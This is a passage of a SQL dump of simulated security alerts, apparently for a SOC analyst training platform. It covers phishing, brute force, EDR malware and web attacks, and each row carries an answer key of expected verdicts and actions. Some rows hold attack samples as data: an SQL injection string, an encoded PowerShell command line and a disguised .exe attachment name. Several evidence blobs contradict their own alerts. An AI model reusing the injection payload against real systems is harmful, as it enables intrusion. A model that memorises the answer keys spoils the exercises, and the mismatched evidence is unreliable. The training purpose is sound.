(941, 'Credential Harvesting via Fake Office365 Login Page', 'critical', 'Email Gateway', 'A phishing email was detected containing a link to a fake Office365 login page designed to steal user credentials.', 'Credential Harvest', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T09:15:03Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.89\",\"dst_ip\":\"10.0.0.23\",\"username\":\"bsmith@company.com\",\"hostname\":\"workstation-05\",\"email_sender\":\"support@office365-support.com\",\"domain\":\"office365-support.com\",\"url\":\"http://phishy-login.com/login\"}', '2026-01-16 13:04:11', '2026-02-16 17:53:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@office365-support.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email address involved in phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishy-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"URL hosting fake login pages for credential harvesting\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The email and URL are confirmed to be malicious, constituting a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Credential Harvesting via Fake Office365 Login Page\",\"date\":\"2026-02-01T20:32:22.626Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(942, 'Unauthorized Remote Access Attempt Detected', 'medium', 'CrowdStrike', 'A remote login attempt was made using valid credentials from an unusual geographic location.', 'Brute Force', 'T1078', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-16T10:30:22Z\",\"event_type\":\"login_failure\",\"src_ip\":\"45.67.89.101\",\"dst_ip\":\"192.168.0.34\",\"username\":\"admin\",\"hostname\":\"server-01\",\"failed_attempts\":15}', '2026-01-16 13:04:11', '2026-03-06 10:23:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.67.89.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username in attacks\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.0.34\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target server\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP has been reported for similar attacks, confirming it as malicious.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(943, 'Suspicious Office365 Login Page Detected', 'medium', 'SIEM', 'A user accessed a URL resembling an Office365 login page. Further investigation revealed it was a phishing attempt.', 'Phishing', 'T1566', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-16T11:45:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"10.1.2.34\",\"dst_ip\":\"198.51.100.45\",\"username\":\"mjohnson@company.com\",\"hostname\":\"desktop-12\",\"url\":\"http://fakeoffice365.com/login\"}', '2026-01-16 13:04:11', '2026-03-06 10:20:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://fakeoffice365.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL recognized for phishing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.34\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL is a known phishing site, indicating a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.627Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T11:45:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.1.2.34\\\",\\\"dst_ip\\\":\\\"198.51.100.45\\\",\\\"username\\\":\\\"mjohnson@company.com\\\",\\\"hostname\\\":\\\"desktop-12\\\",\\\"url\\\":\\\"http://fakeoffice365.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.627Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user 
admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T11:45:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.1.2.34\\\",\\\"dst_ip\\\":\\\"198.51.100.45\\\",\\\"username\\\":\\\"mjohnson@company.com\\\",\\\"hostname\\\":\\\"desktop-12\\\",\\\"url\\\":\\\"http://fakeoffice365.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.627Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T11:45:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.1.2.34\\\",\\\"dst_ip\\\":\\\"198.51.100.45\\\",\\\"username\\\":\\\"mjohnson@company.com\\\",\\\"hostname\\\":\\\"desktop-12\\\",\\\"url\\\":\\\"http://fakeoffice365.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.627Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T11:45:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.1.2.34\\\",\\\"dst_ip\\\":\\\"198.51.100.45\\\",\\\"username\\\":\\\"mjohnson@company.com\\\",\\\"hostname\\\":\\\"desktop-12\\\",\\\"url\\\":\\\"http://fakeoffice365.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.627Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T11:45:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.1.2.34\\\",\\\"dst_ip\\\":\\\"198.51.100.45\\\",\\\"username\\\":\\\"mjohnson@company.com\\\",\\\"hostname\\\":\\\"desktop-12\\\",\\\"url\\\":\\\"http://fakeoffice365.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(944, 'QR Code Phishing Attack', 'high', 'Email Gateway', 'An email containing a QR code linked to a phishing site was detected. The QR code directed users to a credential-stealing page.', 'Phishing', 'T1566', 1, 'Closed', 297, '{\"timestamp\":\"2026-01-16T12:00:05Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.2.12\",\"username\":\"klee@company.com\",\"hostname\":\"laptop-07\",\"email_sender\":\"it-support@companyx.com\",\"domain\":\"companyx.com\",\"url\":\"http://phishing-site.com/qrcode\"}', '2026-01-16 13:04:11', '2026-03-15 11:47:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"it-support@companyx.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email address used in phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-site.com/qrcode\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing activity\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and QR code URL are confirmed malicious, making this a true positive.\"}', 'Beginner', 'CORE', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"QR Code Phishing Attack\",\"date\":\"2026-02-01T20:32:22.628Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(945, 'Email with Suspicious Attachment Detected', 'medium', 'Email Gateway', 'An email containing an attachment was detected, which appeared suspicious but was verified as safe after analysis.', 'Phishing', 'T1566', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-16T13:22:15Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.11\",\"dst_ip\":\"192.168.2.67\",\"username\":\"david@company.com\",\"hostname\":\"office-pc-01\",\"email_sender\":\"support@legitprovider.com\",\"domain\":\"legitprovider.com\",\"filename\":\"invoice.doc\"}', '2026-01-16 13:04:11', '2026-02-17 05:27:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@legitprovider.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Email sender verified as legitimate\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"invoice.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Attachment analyzed and no malicious activity detected\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.67\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and attachment were verified as clean, indicating a false positive.\"}', 'Beginner', 'CORE', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Email with Suspicious Attachment Detected\",\"date\":\"2026-02-01T20:32:22.629Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear 
User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(946, 'Suspicious Lookalike Domain Email', 'low', 'Proofpoint', 'An email from a domain that looks similar to a trusted partner\'s domain was received, but analysis confirmed it as legitimate.', 'Phishing', 'T1566', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-16T14:10:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.99\",\"dst_ip\":\"192.168.3.12\",\"username\":\"lisa@company.com\",\"hostname\":\"desktop-15\",\"email_sender\":\"contact@trustpartner.com\",\"domain\":\"trustpartner.com\"}', '2026-01-16 13:04:11', '2026-02-17 05:27:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"contact@trustpartner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Domain verified as legitimate\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"trustpartner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Domain confirmed as legitimate\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.3.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The domain and email sender are confirmed legitimate, making this a false positive.\"}', 'Beginner', 'CORE', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Lookalike Domain Email\",\"date\":\"2026-02-01T20:32:22.630Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice 
immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(947, 'BEC Attempt Using CEO Impersonation', 'high', 'Email Gateway', 'An email impersonating the CEO was detected, attempting to initiate an unauthorized fund transfer.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T15:42:08Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"10.0.5.23\",\"username\":\"finance@company.com\",\"hostname\":\"accounting-pc\",\"email_sender\":\"ceo@company.com\",\"domain\":\"company.com\",\"url\":\"http://malicious-transfer.com/funds\"}', '2026-01-16 13:04:11', '2026-02-16 17:10:44', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email used in BEC scams\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-transfer.com/funds\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"URL associated with fraudulent financial actions\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user machine\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are known for BEC scams, confirming a true positive.\"}', 'Beginner', 'CORE', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"BEC Attempt Using CEO Impersonation\",\"date\":\"2026-02-01T20:32:22.631Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, 
please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(948, 'Brute Force Attack Detected from External IP', 'high', 'Splunk', 'Multiple failed login attempts detected on user account from a known malicious IP address.', 'Brute Force', 'T1110', 1, 'Closed', 93, '{\"timestamp\":\"2026-01-16T10:23:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"failed_attempts\":35}', '2026-01-16 13:12:47', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account activity\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a known malicious IP indicate a brute force attack.\"}', 'Novice', 'SIEM', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.633Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T10:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:31:22.633Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T10:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:30:22.633Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T10:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:29:22.633Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T10:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:28:22.633Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T10:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(949, 'Malware Detected via EDR', 'critical', 'CrowdStrike', 'Malicious file execution detected with a known malware hash.', 'Malware', 'T1059', 1, 'closed', 129, '{\"timestamp\":\"2026-01-16T11:11:11Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"hostname\":\"desktop02\",\"command_line\":\"C:\\\\malware\\\\evil.exe\",\"file_hash\":\"1234567890abcdef1234567890abcdef\"}', '2026-01-16 13:12:47', '2026-02-14 22:55:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected with 75 antivirus engines marking as malware.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\evil.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Suspicious file execution on internal network.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches known malware, confirming the alert as a true positive.\"}', 'Novice', 'EDR', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(950, 'Phishing Email Detected', 'high', 'Proofpoint', 'A phishing email containing a malicious link was received by the user.', 'Phishing', 'T1566', 1, 'Closed', 74, '{\"timestamp\":\"2026-01-16T09:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.5\",\"username\":\"asmith\",\"email_sender\":\"phisher@maliciousdomain.com\",\"url\":\"http://maliciousdomain.com/stealinfo\"}', '2026-01-16 13:12:47', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/stealinfo\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known for hosting phishing content.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a known phishing URL, confirming the malicious intent.\"}', 'Novice', 'CORE', 1, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:22.636Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(951, 'SQL Injection Attempt Detected', 'high', 'Wazuh', 'A SQL injection payload was detected in a web request.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T12:45:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.20\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"url\":\"http://victimsite.com/login\"}', '2026-01-16 13:12:47', '2026-02-11 14:00:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous SQL injection attempts\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The SQL injection payload is a common attack vector, confirming it as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.636Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T12:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://victimsite.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.636Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
